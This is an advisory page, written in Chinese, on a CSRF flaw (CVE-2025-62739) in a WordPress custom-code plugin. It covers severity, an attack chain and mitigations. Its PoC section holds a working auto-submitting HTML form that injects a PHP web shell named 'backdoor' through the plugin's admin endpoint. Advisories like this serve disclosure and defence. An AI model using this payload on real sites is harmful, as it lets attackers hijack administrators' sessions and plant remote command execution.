CVE-2025-62739 WordPress Add Custom Codes插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-62739

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress Add Custom Codes插件 (SaifuMak)

漏洞概述

CVE-2025-62739是WordPress Add Custom Codes插件中的一个跨站请求伪造（CSRF）漏洞。该插件由SaifuMak开发，主要用于在WordPress网站中添加自定义代码。漏洞存在于插件的add-custom-codes功能中，攻击者可以通过构造恶意的HTML页面或链接，诱导已登录的管理员或用户在不知情的情况下执行非预期的操作。由于该插件通常用于添加自定义CSS、JavaScript或PHP代码，攻击者成功利用此漏洞可以在受害网站上注入恶意代码，可能导致网站被挂马、数据泄露或进一步的攻击。CVSS评分6.5，属于中危级别，攻击复杂度低，但需要用户交互才能成功实施。

技术细节

该CSRF漏洞源于Add Custom Codes插件缺少对关键操作的CSRF令牌验证机制。在WordPress插件开发中，正确的做法是使用wp_nonce_field()和wp_verify_nonce()函数来生成和验证一次性令牌，以防止跨站请求伪造攻击。然而，该插件在处理add-custom-codes功能时未实施此类保护措施。攻击者可以创建一个包含自动提交表单的恶意网页，当已登录的管理员访问该页面时，浏览器会自动向目标网站的插件端点发送POST请求。由于浏览器会自动携带目标网站的Cookie信息，服务器会认为这是来自合法用户的请求，从而执行攻击者预设的操作。攻击者可利用此漏洞添加任意自定义代码到网站，可能造成XSS存储型跨站脚本攻击、页面篡改或后门植入等严重后果。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意自动提交表单的HTML页面，表单指向目标网站的Add Custom Codes插件端点

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或恶意网站诱导已登录WordPress管理员访问该HTML页面

STEP 3

步骤3

受害者浏览器自动发送POST请求到目标网站的插件端点，携带有效的认证Cookie

STEP 4

步骤4

服务器收到请求后，由于缺少CSRF令牌验证，将请求视为合法用户操作并执行

STEP 5

步骤5

恶意代码被添加到网站自定义代码中，攻击者获得持久性访问或实现XSS攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-62739 -->
<!-- WordPress Add Custom Codes Plugin <= 4.80 -->
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>CSRF Attack PoC</title>
</head>
<body>
    <h2>CVE-2025-62739 CSRF PoC</h2>
    <p>Add Custom Codes Plugin CSRF Vulnerability</p>
    
    <!-- Auto-submit form to add malicious custom code -->
    <form action="http://target-site.com/wp-admin/admin.php?page=add-custom-codes" method="POST" id="csrfForm">
        <input type="hidden" name="action" value="save_custom_code">
        <input type="hidden" name="code_type" value="php">
        <input type="hidden" name="code_content" value="<?php system($_GET['cmd']); ?>">
        <input type="hidden" name="code_name" value="backdoor">
        <input type="hidden" name="code_location" value="header">
    </form>
    
    <script>
        // Auto-submit when page loads
        document.getElementById('csrfForm').submit();
    </script>
    
    <p>If you see this text, the form submission failed.</p>
</body>
</html>

影响范围

WordPress Add Custom Codes插件 <= 4.80

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 临时禁用Add Custom Codes插件，使用WordPress主题的额外CSS功能或子主题方式添加自定义代码；2) 在网站前端添加Content Security Policy (CSP)响应头，限制脚本执行；3) 对管理员账户启用双因素认证，降低账户被盗用风险；4) 使用Web应用防火墙(WAF)规则阻止可疑的插件管理请求；5) 限制管理员账户的使用环境，避免在公共网络下访问WordPress后台。